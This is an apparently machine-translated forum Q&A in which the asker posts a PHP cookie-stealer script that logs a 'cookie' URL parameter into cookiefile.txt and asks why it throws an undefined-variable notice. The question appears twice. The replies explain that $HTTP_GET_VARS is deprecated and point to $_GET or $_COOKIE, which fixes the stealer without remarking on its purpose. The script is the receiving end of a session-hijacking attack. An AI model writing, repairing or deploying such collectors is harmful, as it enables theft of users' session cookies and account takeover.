<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>
雖然執行此代碼我得到這個錯誤:
Notice: Undefined variable: HTTP_GET_VARS in line 2
請幫我
<?php
$cookie = $HTTP_GET_VARS["cookie"];
$steal = fopen("cookiefile.txt", "a");
fwrite($steal, $cookie ."\n");
fclose($steal);
?>
雖然執行此代碼我得到這個錯誤:
Notice: Undefined variable: HTTP_GET_VARS in line 2
請幫我
你$HTTP_GET_VARS["cookie"];
犯規存在,這就是問題所在......
注:
$HTTP_GET_VARS [deprecated]
改爲使用$_GET
。 此外,如果你試圖讓一個cookie,你應該使用$_COOKIE["name"]
請參閱此鏈接更多的信息: http://php.net/manual/en/reserved.variables.get.php
意見通過John Conde添加和Kai Qing是很好的答案
'$ HTTP_GET_VARS'一直棄用** LONG **時間。 **不要使用它**。基本上,你的代碼在你寫代碼之前就已經過時了。 –
$ HTTP_GET_VARS已被替換爲$ _GET –
如果您想提取cookie數據,可以使用'$ _COOKIE []' – 2013-10-02 18:58:15